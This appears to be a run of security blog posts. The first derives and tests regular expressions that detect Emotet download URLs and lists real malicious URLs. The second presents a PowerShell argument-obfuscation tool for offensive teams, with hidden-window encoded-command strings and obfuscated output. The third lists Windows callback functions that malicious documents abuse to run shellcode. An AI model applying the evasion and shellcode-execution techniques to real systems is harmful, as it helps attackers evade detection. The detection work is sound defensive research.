http://12back.com/dw3wz-ue164-qqv/ http://4glory.net/p7lrq-s191-iv/ http://aconai.fr/v4OZ-PR72-gtS/ http://adamkranitz.com/gqj5ijg-y250-ex/ http://allisonhibbard.com/x4b-th601-m/

In Group 1, we can actually refine this a bit once you see the underlying pattern. Almost every part of this one changed so I'll just go back over it: 1-3 alpha, 1 digit, 1-3 alpha, dash, 1-2 alpha, 2-3 digit, dash, 1-5 alpha.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$
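A quick way to see why the tighter Group 1 pattern is worth the effort is to run both versions over the samples plus a benign-looking URL. This is only a sketch: Python's re stands in for PCRE, and the "summer-sale-now" URL is a hypothetical example I made up to illustrate a plausible false positive.

```python
import re

OLD = re.compile(
    r"^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$"
)
NEW = re.compile(
    r"^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}"
    r"-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$"
)

# The five Group 1 samples listed above.
SAMPLES = [
    "http://12back.com/dw3wz-ue164-qqv/",
    "http://4glory.net/p7lrq-s191-iv/",
    "http://aconai.fr/v4OZ-PR72-gtS/",
    "http://adamkranitz.com/gqj5ijg-y250-ex/",
    "http://allisonhibbard.com/x4b-th601-m/",
]
# Hypothetical benign URL: three dash-separated words, no digits.
BENIGN = "http://example.com/summer-sale-now/"

for url in SAMPLES + [BENIGN]:
    print(bool(OLD.search(url)), bool(NEW.search(url)), url)
```

Both versions keep all five samples, but only the old one also matches the word-only path, since the new one requires digits in fixed positions.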

[Group 07] - [ LUqc663BAyN333-HoO ]

http://agenity.com/EAVx829uahI723-tv/ http://argoinf.com/YFSR334KgXCe907-z/ http://artmedieval.net/RK415njzzR555-p/ http://autoradio.com.br/fRq804tvz270-tWa/ http://belief-systems.com/obn247eaC420-Z/

In Group 7, the first part of the pattern can be refined: 1-4 alphanumeric, 3 digits, 1-5 alpha, 3 digits.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{10,15}-[a-zA-Z]{1,3}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$

[Group 08] - [ NUDA-X-52454-DE ]

http://altius.co.in/EJZB-T-66361-DE/ http://anjep.com/TBWEV-YCAP-91327-DE/ http://aquarthe.com/AIUO-P-70826-DE/ http://bitach.com/RIJW-FNFE-86299-DE/ http://cliftonsecurities.co.uk/YJTX-NMO-51102-DE/

In Group 8 they all end with "DE" so I'll convert that part to a static string.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-[A-Z]{2}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://archabits.com/ORDER.-AXN-60-X400251/ http://arrosio.com.ar/ORDER.-Document-SF-41-F318806/ http://arroyave.net/Rech-K-682-GO1130/ http://avenueevents.co.uk/Cust-PBP-03-D683320/ http://babyo.com.mx/Cust-Document-KEQ-04-FF065857/

In Group 9, every entry ends with 1-3 alpha(upper) followed by 4-6 digits.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z0-9]{6,10}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$

The final run for the PCRE's before FP testing.

[+] FOUND [+]
Count: 127/696
Comment: [Group 01] - [ t5wx-x064-mzdb ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$

[+] FOUND [+]
Count: 80/696
Comment: [Group 02] - [ INVOICE-864339-98261 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[+] FOUND [+]
Count: 29/696 (changed to new pattern)
Comment: [Group 03] - [ dhl/paket/com/pkp/appmanager/8376315127 ]
PCRE: ^http:\/\/([^\x2F]+\/)+dhl\/paket\/com\/pkp\/appmanager\/[0-9]{10}\/$

[+] FOUND [+]
Count: 56/696
Comment: [Group 04] - [ RRT-13279129.dokument ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$

[+] FOUND [+]
Count: 86/696
Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$

[+] FOUND [+]
Count: 62/696
Comment: [Group 06] - [ download2467 ]
PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

[+] FOUND [+]
Count: 47/696
Comment: [Group 07] - [ LUqc663BAyN333-HoO ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$

[+] FOUND [+]
Count: 14/696
Comment: [Group 08] - [ NUDA-X-52454-DE ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$

[+] FOUND [+]
Count: 38/696
Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$

[+] FOUND [+]
Count: 11/696
Comment: [Group 10] - [ zp3x-r88-wuh.view ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 11] - [ dhl___status___2668292851 ]
PCRE: ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$

[+] FOUND [+]
Count: 35/696
Comment: [Group 12] - [ ORDER.-5883789520 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$

[+] FOUND [+]
Count: 15/696
Comment: [Group 13] - [ 6572646300 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 14] [ SCANNED/RZ7498WEXEZB ]
PCRE: ^http:\/\/([^\x2F]+\/)+SCANNED\/[A-Z]{2,3}[0-9]{4}[A-Z]{6,9}\/$

[+] FOUND [+]
Count: 60/696
Comment: [Group 15] [ K44975X ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$

That leaves only 30 URL's that I was unable to reliably match - not too shabby! You can find the output of the pcre_check script showing the matches and non-matches HERE.

The current PCRE list is below.

^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$ [Group 01] - [ t5wx-x064-mzdb ]
^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ [Group 02] - [ INVOICE-864339-98261 ]
^http:\/\/([^\x2F]+\/)+dhl\/paket\/com\/pkp\/appmanager\/[0-9]{10}\/$ [Group 03] - [ dhl/paket/com/pkp/appmanager/8376315127 ]
^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ [Group 04] - [ RRT-13279129.dokument ]
^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]
^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [Group 06] - [ download2467 ]
^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$ [Group 07] - [ LUqc663BAyN333-HoO ]
^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$ [Group 08] - [ NUDA-X-52454-DE ]
^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$ [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]
^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$ [Group 10] - [ zp3x-r88-wuh.view ]
^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ [Group 11] - [ dhl___status___2668292851 ]
^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$ [Group 12] - [ ORDER.-5883789520 ]
^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$ [Group 13] - [ 6572646300 ]
^http:\/\/([^\x2F]+\/)+SCANNED\/[A-Z]{2,3}[0-9]{4}[A-Z]{6,9}\/$ [Group 14] [ SCANNED/RZ7498WEXEZB ]
^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$ [Group 15] [ K44975X ]

Rule Vetting

The last step is to check the PCRE's against a corpus of random URL's and see if they appear strict enough in their matching to be used in a production environment. This is critical if you plan to use them for blocking instead of just identification. I can't stress enough how important this phase is; while it's nice to be alerted on access to one of these URL's, it's solid gold if you can prevent attacks and C2 from happening in the first place. Of course, with any blocking action, the caveat is that one wrong block could spell disaster so these need to be as close to perfect as possible.

Ideally, you want to test against a large amount of URL's from your own environment that most closely resemble what traffic your users generate. Unfortunately that's not always possible, or you don't have users, so you need to either build your own corpus or find someone who can test the PCRE's for you.

There isn't much online in the way of random URL lists or logs but I've put together a few possible methods one could try to compile a fairly random set of URL's, and then I'll detail my preferred method.

The Twitter option works nicely and can generate hundreds of thousands of unique URL's per day. Given enough time, you'll have a solid base to test your PCRE's against.

To do this, you need to register an app with Twitter and get your API keys. Once you have those, I've included a Python script, twitter_scraper, that you can input them into and run in a continuous loop with a one-liner like the below.

while true; do sleep 5; python twitter_scraper.py >> twitter_urls; done

I've also included 2 million URL's on GitHub, which is just under the 25MB file limit compressed. These are ones that I've scraped in the past few days and should help you get started.

Typically I'll check this every so often and filter out things like URL shortening services or other sites that, for one reason or another, have bubbled up to the top of my domain list. This keeps it filled with fairly unique sites and helps improve entropy.
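The periodic clean-up can be sketched roughly as follows. This is an illustration under my own assumptions rather than the script I actually use: top_domains and drop_domains are hypothetical helper names, and the ".example" hosts are placeholders for whatever bubbles up in your own list.

```python
from collections import Counter
from urllib.parse import urlsplit


def top_domains(urls, n=10):
    """Count hostnames so over-represented sites can be reviewed."""
    counts = Counter(urlsplit(u).hostname for u in urls)
    return counts.most_common(n)


def drop_domains(urls, blocked):
    """Remove URLs whose hostname is in the blocked set."""
    return [u for u in urls if urlsplit(u).hostname not in blocked]


# Hypothetical sample; in practice this would be read from the scraped file.
urls = [
    "http://short.example/abc",
    "http://short.example/def",
    "http://short.example/ghi",
    "http://site-one.example/news/1/",
    "http://site-two.example/post/2/",
]
print(top_domains(urls, n=1))
filtered = drop_domains(urls, {"short.example"})
print(filtered)
```

Reviewing the top of the count before blocking anything keeps the decision manual, which matters since a popular legitimate site is exactly what you want in an FP corpus.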

Below is a GIF of the sites streaming by in real time, showing some of the variety.

Once we have our list, we can run pcre_check against the URL's and see how our PCRE's fare.

$ python pcre_check.py -u twitter_urls -p emotet_pcres -s

[+] FOUND [+]
Count: 1290/2000000
Comment: [Group 13] - [ 6572646300 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$
[-] MATCH [-]
http://db.netkeiba.com/horse/1985105175/
...
http://www.northernminer.com/news/lukas-lundin-copper-commodity-choice/1003786598/
http://www.oita-trinita.co.jp/news/20170532318/
...
http://www.schuh.co.uk/womens/irregular-choice-x-disney-how-do-i-look?-pink-flat-shoes/1364153360/
...
http://www.yutaro-miura.com/info/event/2017/0528100324/
http://yapi.ta2o.net/maseli/2017052901/

[+] FOUND [+]
Count: 2595/2000000
Comment: [Group 15] [ K44975X ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$
[-] MATCH [-]
http://epcaf.com/c2805tw/
...
http://hobbyostrov.ru/automodels/electro-monster-1-10/tra3602g/
...
http://monipla.jp/mfpa/card2017ss/
http://ncode.syosetu.com/N0588Q/
...
http://www.nollieskateboarding.com/fs5050grind/
http://www.profootballweekly.com/2017/05/30/victor-cruz-prepared-to-produce-and-mentor-in-chicago-bears-transitioning-wr-corps/a4613p/

Using the "-s" (show matches) flag in pcre_check will allow you to manually review the false positives. If the sites don't look legitimate or match a little too perfectly, you'll want to do a little manual research to make sure they are in fact FP's and not true positives you didn't know about. I've truncated the results but above shows a few under each to give you an idea of the kind of output I'm looking for to conclude it's not up-to-par.

As you can see, Group 13 and 15 have numerous false-positives. This isn't surprising given Group 13 is simply 10 digits and Group 15 is a small range of alpha, digits, alpha, which continued to repeat itself throughout my analysis.

Additionally, I sent these PCRE's to some fellow miscreant punchers who ran them through billions of URL's from their environment and received similar output, with FP's only for Group 13 and 15.

The last check I'll perform for this set is to remove the trailing forward slash ("/") that was included in the PCRE's. The reason for this is that, while my Emotet seed list all included the forward slash, the URL's I'm scraping may not have it and I just want to try to further identify any potential issues.
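Producing the modified PCRE file is mechanical. A minimal sketch of the idea, assuming every pattern ends in the literal suffix \/$ as the ones in this post do; drop_trailing_slash is a hypothetical helper, Python's re stands in for PCRE, and the example host is made up.

```python
import re


def drop_trailing_slash(pcre):
    r"""Turn a pattern ending in '\/$' into one ending in '$'."""
    suffix = r"\/$"
    if pcre.endswith(suffix):
        return pcre[: -len(suffix)] + "$"
    return pcre


original = r"^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$"
modified = drop_trailing_slash(original)

# Hypothetical URL: the same path with and without the trailing slash.
with_slash = "http://example.com/download2467/"
without_slash = "http://example.com/download2467"

print(modified)
print(bool(re.search(original, without_slash)), bool(re.search(modified, without_slash)))
```

Note that the modified pattern no longer matches the slash-terminated form, so this variant is for the extra FP check only and does not replace the originals.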

$ python pcre_check.py -p emotet_pcres_mod -u twitter_urls

Nada. Fantastic!


All in all, 13 total PCRE's make the cut and cover the seen Emotet download URL's. These will provide good historical forensic capability and good passive blocking for future victims of these campaigns.

With that, the below is the final list for publishing and available on GitHub, along with all of the above iterations.

^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$ karttoon 31MAY2017 - Emotet download - [ t5wx-x064-mzdb ]
^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ karttoon 31MAY2017 - Emotet download - [ INVOICE-864339-98261 ]
^http:\/\/([^\x2F]+\/)+dhl\/paket\/com\/pkp\/appmanager\/[0-9]{10}\/$ karttoon 31MAY2017 - Emotet download - [ dhl/paket/com/pkp/appmanager/8376315127 ]
^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ karttoon 31MAY2017 - Emotet download - [ RRT-13279129.dokument ]
^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ karttoon 31MAY2017 - Emotet download - [ EDHFR-08-77623-document-May-04-2017 ]
^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ karttoon 31MAY2017 - Emotet download - [ download2467 ]
^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$ karttoon 31MAY2017 - Emotet download - [ LUqc663BAyN333-HoO ]
^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$ karttoon 31MAY2017 - Emotet download - [ NUDA-X-52454-DE ]
^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$ karttoon 31MAY2017 - Emotet download - [ CUST.-Document-YDI-04-GQ389557 ]
^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$ karttoon 31MAY2017 - Emotet download - [ zp3x-r88-wuh.view ]
^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ karttoon 31MAY2017 - Emotet download - [ dhl___status___2668292851 ]
^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$ karttoon 31MAY2017 - Emotet download - [ ORDER.-5883789520 ]
^http:\/\/([^\x2F]+\/)+SCANNED\/[A-Z]{2,3}[0-9]{4}[A-Z]{6,9}\/$ karttoon 31MAY2017 - Emotet download [ SCANNED/RZ7498WEXEZB ]

Hopefully this was helpful to some and demonstrated the ease with which these can be created to identify malicious patterns.

The more the merrier in the sharing community!


One thing I've noticed lately while analyzing PowerShell attacks is that no one is doing much in the way of argument obfuscation. The attacks focus primarily on their end payload, or the delivery mechanism, and use PowerShell simply as their vessel to launch their evil code. At most I see some tools randomizing case or, over the course of iterations, the developers have shortened arguments but nothing really useful.

To illustrate, I'm going to pick on Magic Unicorn (because it rocks) and show how the arguments used to launch PowerShell have changed.

3eda35e: full_attack = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + base64
922c34f: full_attack = "powershell -nop -wind hidden -noni -enc " + base64
a18cb5d: full_attack = "powershell -nop -win hidden -noni -enc " + base64

Not a whole lot of change over a two year period: no change of case, static argument positioning, and just a shortening of the used arguments.

If you check out another popular tool, PowerSploit, you can see how they approach building the arguments to launch their PowerShell payloads.

# Build the command line options
# Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
$CommandlineOptions = New-Object String[](0)
if ($PSBoundParameters['NoExit']) { $CommandlineOptions += '-NoE' }
if ($PSBoundParameters['NoProfile']) { $CommandlineOptions += '-NoP' }
if ($PSBoundParameters['NonInteractive']) { $CommandlineOptions += '-NonI' }
if ($PSBoundParameters['WindowStyle']) { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }

Again, no argument position randomization since they join the arguments as they are built; however, you have the potential to include or exclude various arguments based on your need, which of course will make it less static. It's slightly better than Magic Unicorn in that respect.

Soooo...what? Who cares and why is this relevant?

It's relevant because when you know an attacker's tool-of-choice, at best you may be able to create point-defenses to stop them but, at worst, you at least get an insight into the attacker's tool set and capabilities. With either end of the spectrum, it's good information to have when thinking about what step to take next during analysis or response.

Now, most PowerShell attacks that I see are delivered through malicious Microsoft Office documents containing macros that launch PowerShell OR through generated binaries that are simply designed to execute the commands. I've seen a lot of effort go into obfuscating macros and a lot of work go into the actual PowerShell payloads but I assume most people look at the arguments and don't think much about this middle link. It's so inconsequential to the overall attack but it does provide a perfect place for analysts and defenders to profile or identify the code.

Ok, but how unique are these argument strings?

To use the two tools from above, if I Google each of their respective strings...

First (oldest) Magic Unicorn: 58 hits "-noprofile -windowstyle hidden -noninteractive -EncodedCommand"
Second Magic Unicorn: 150 hits "-nop -wind hidden -noni -enc"
Third (newest) Magic Unicorn: 447 hits "-nop -win hidden -noni -enc"
PowerSploit: 41 hits "-NoP -NonI -W Hidden -E"

It's relatively trivial to go from one of those lines, which get generated as process activity in every sandbox under the sun, to a small set of hits on Google. When used with additional contextual information (e.g. payload or delivery mechanism) you can try to narrow in faster on the tool. It's not rocket science and, for it to actually be useful, it requires at least enough arguments to stand out from someone just running, for example, "-encodedcommand".

In my experience, I've found these argument patterns to be very helpful and use them quite frequently during analysis. This, of course, now brings me to the point of the blog - a new tool I put together called argfuscator which attempts to address the issues I mentioned previously.

Specifically, it will randomly adjust lengths of each argument, randomize case in arguments, randomize case in values (sans base64 in "encodedcommand"), randomize caret injection for further command-line obfuscation (sans values provided to "command"), and finally randomize the argument positions. There is enough variety that it creates fairly unique strings each time.

Using the same four strings as before, but now running them through the tool.

$ python argfuscator.py "powershell.exe -noprofile -windowstyle hidden -noninteractive -EncodedCommand ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="
pOwErsheLL.EXe -e^nco^d^e^dc ZQ^BjAGg^A^bw^AgA^C^IA^V^w^B^pA^H^oAYQ^B^yAG^Q^AI^g^A^= -Wi^N^do hI^dDE^N -n^OnIN^t -n^O^P^R

$ python argfuscator.py "powershell.exe -nop -wind hidden -noni -enc ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="
pOwERSHElL.Exe -encodedcommand ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA= -WI^N^doWS H^I^d^DEn -n^op^rO^f -nONInTeRAcTiVe

$ python argfuscator.py "powershell.exe -nop -win hidden -noni -enc ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="
powerShELl.exe -Wi hiDDEn -n^oPRoF -ec ZQ^B^jA^G^g^A^bwAg^ACIA^VwBp^AH^o^AYQ^B^y^AGQ^AI^g^A= -NONInTeRaCTiVe

$ python argfuscator.py "powershell.exe -NoP -NonI -W Hidden -E ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="
p^O^wE^R^s^hELl.^EXe -e ZQB^jA^GgAbwAg^A^C^I^A^VwB^pA^H^o^AYQ^By^AG^QAI^gA^= -w^iN^d^o^Ws^t h^i^dD^eN -NoninteRActIv -NOprofilE
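For the defenders reading along, the flip side is that string matching on the raw arguments stops working and you have to normalize first. Here is a rough sketch of what that might look like; it is not part of argfuscator, the CANONICAL list and ALIASES table are illustrative assumptions rather than a complete reference of powershell.exe arguments, and normalize_arg and fingerprint are hypothetical names.

```python
# Canonical argument names to resolve against. This list and the alias
# table are illustrative assumptions, not a complete reference.
CANONICAL = [
    "encodedcommand",
    "noprofile",
    "noninteractive",
    "windowstyle",
    "noexit",
]
ALIASES = {"ec": "encodedcommand"}


def normalize_arg(arg):
    """Map an obfuscated argument such as '-Wi^N^do' to a canonical name."""
    name = arg.replace("^", "").lstrip("-").lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [c for c in CANONICAL if c.startswith(name)]
    # Only resolve unambiguous prefixes; otherwise return the cleaned name.
    return matches[0] if len(matches) == 1 else name


def fingerprint(command_line):
    """Return the sorted canonical argument names found in a command line."""
    tokens = command_line.split()
    return sorted(
        normalize_arg(t) for t in tokens if t.replace("^", "").startswith("-")
    )


# Third Magic Unicorn string and its argfuscator output from above.
plain = "powershell.exe -nop -win hidden -noni -enc ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="
obfuscated = (
    "powerShELl.exe -Wi hiDDEn -n^oPRoF -ec "
    "ZQ^B^jA^G^g^A^bwAg^ACIA^VwBp^AH^o^AYQ^B^y^AGQ^AI^g^A= -NONInTeRaCTiVe"
)
print(fingerprint(plain))
print(fingerprint(obfuscated))
```

After normalization both command lines reduce to the same set of arguments, which tells you what was used but no longer which tool built the string, and that is the whole point of the obfuscation.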

I've tested the script using various custom PowerShell commands, along with regenerating ones I've seen in the wild, and it all seemed to work or I ironed out the bugs. I'm sure it's not perfect and there are certain areas that could use improving but I think it's a decent start that can provide value for the offensive teams out there.

Sometimes it's the little things...

The code is available on GitHub.

I've been doing a lot of analysis on malicious docs (maldocs) lately and a popular variant circulating right now uses a technique that I found particularly interesting. Effectively, it abuses native Windows function calls to transfer execution to shellcode that it loads into memory. I thought it was cool in this context, and not something I was super familiar with (even though I've since learned it's a very old technique), so I set out to do some research into identifying additional functions that could be abused in a similar way and how to leverage them.

To give you an idea of how this works, I'll go over a quick example of how shellcode can be executed through a function. For this, I'll use EnumResourceTypesA.

EnumResourceTypesA(
    __in_opt HMODULE hModule,
    __in ENUMRESTYPEPROCA lpEnumFunc,
    __in LONG_PTR lParam
);

As stated by Microsoft, this function "enumerates resource types within a binary module" and the second argument, the interesting bit, is "a pointer to the callback function to be called for each enumerated resource type". If I supply the memory address of the shellcode to lpEnumFunc, it will pass each enumerated resource to that function but, since it's the shellcode, it just executes whatever is at the memory address I provided - keep in mind the memory page still needs to allow for code execution.

In the context of maldocs, VBA gives you the capability to directly call Windows functions. Outside of VBA, these functions can also be leveraged during typical exploitation attacks if you know the target application already has the function imported. Depending on the function and its required arguments, you could possibly save ROP chain space that would typically be used for gadgets that carry out similar functionality. In addition, from a general offsec perspective, if you continue using the same function calls for your maldocs, you leave a very clear pattern of dynamic and static artifacts that make it trivial to track and detect, so it's nice to have the option of mixing things up a bit. As the saying goes, variety is the spice of life!

To enumerate all of the possible functions, I looked at the C header files that come in the Windows 7 x86 SDK.

$ cat *.h |tr '\r\n' ' ' |tr ';' '\n' |sed -e 's/--//g' -e 's/ / /g' |grep -iE "__in.+(Func|Proc|CallBack| lpfn| lpproc)," |grep -oE " [a-zA-Z]+\([a-zA-Z0-9*_, ]+\)" |grep "__in" |cut -d"(" -f1 |sort -u |sed -e 's/^ //g'

The meat of it is the grep for '(Func|Proc|CallBack| lpfn| lpproc)', the rest is mainly attempting to normalize the header file function structures for easier parsing since they were all over the place in terms of style.
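For anyone who finds the shell pipeline hard to follow, here is a rough Python sketch of the same idea. It is not the command I actually ran; the function name candidate_functions and the sample header text are made up for illustration, and it only approximates the normalization the sed/tr steps do.

```python
import re

# Same hint the grep uses: an __in argument whose name looks like a callback.
CALLBACK_HINT = re.compile(r"__in.+(Func|Proc|CallBack| lpfn| lpproc),", re.IGNORECASE)
# A function name followed by a simple parenthesized argument list.
PROTOTYPE = re.compile(r" ([a-zA-Z]+)\(([a-zA-Z0-9*_, ]+)\)")


def candidate_functions(header_text):
    """Return sorted, de-duplicated function names that take a callback-like argument."""
    # Collapse all whitespace so multi-line prototypes end up on one line.
    flat = re.sub(r"\s+", " ", header_text)
    names = set()
    # Split on ';' so each prototype is inspected on its own.
    for statement in flat.split(";"):
        if not CALLBACK_HINT.search(statement):
            continue
        for name, args in PROTOTYPE.findall(statement):
            if "__in" in args:
                names.add(name)
    return sorted(names)


# Hypothetical header excerpt, only for demonstration.
SAMPLE = """
WINBASEAPI BOOL WINAPI EnumResourceTypesA(
    __in_opt HMODULE hModule,
    __in ENUMRESTYPEPROCA lpEnumFunc,
    __in LONG_PTR lParam
    );
WINBASEAPI DWORD WINAPI GetTickCount( VOID );
"""

if __name__ == "__main__":
    print(candidate_functions(SAMPLE))
```

Just like the one-liner, this will produce false positives and still needs manual review of each hit.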

After getting a list of candidate functions, I set out testing each one to try and figure out which would be the most likely to be used in maldocs. This equated to me reading the MSDN article to understand the purpose of the function and then writing a few quick lines of VBA to see if I could get it working. While most of these can most likely be massaged into executing code at your specified address, there isn't a lot of reward in chaining together multiple functions to do so with the abundance of "easy" ones. For example, the DestroyCluster function has a similar callback argument, but you'd also have to call CreateCluster and OpenCluster to set up the environment first, which is a bit much for the use case.

The below table lists the identified functions which appeared to have the ability to accept a memory address for code execution and may be open to possible abuse.

AddClusterNode BluetoothRegisterForAuthentication CMTranslateRGBsExt
CallWindowProcA CallWindowProcW CreateCluster
CreateDialogIndirectParamA CreateDialogIndirectParamW CreateDialogParamA
CreateDialogParamW CreatePrintAsyncNotifyChannel CreateTimerQueueTimer
DavRegisterAuthCallback DbgHelpCreateUserDump DbgHelpCreateUserDumpW
DdeInitializeA DdeInitializeW DestroyCluster
DialogBoxIndirectParamA DialogBoxIndirectParamW DialogBoxParamA
DialogBoxParamW DirectSoundCaptureEnumerateA DirectSoundCaptureEnumerateW
DirectSoundEnumerateA DirectSoundEnumerateW DrawStateA
DrawStateW EnumCalendarInfoA EnumCalendarInfoW
EnumChildWindows EnumDateFormatsA EnumDateFormatsW
EnumDesktopWindows EnumDesktopsA EnumDesktopsW
EnumEnhMetaFile EnumFontFamiliesA EnumFontFamiliesExA
EnumFontFamiliesExW EnumFontFamiliesW EnumFontsA
EnumFontsW EnumICMProfilesA EnumICMProfilesW
EnumLanguageGroupLocalesA EnumLanguageGroupLocalesW EnumMetaFile
EnumObjects EnumPropsExA EnumPropsExW
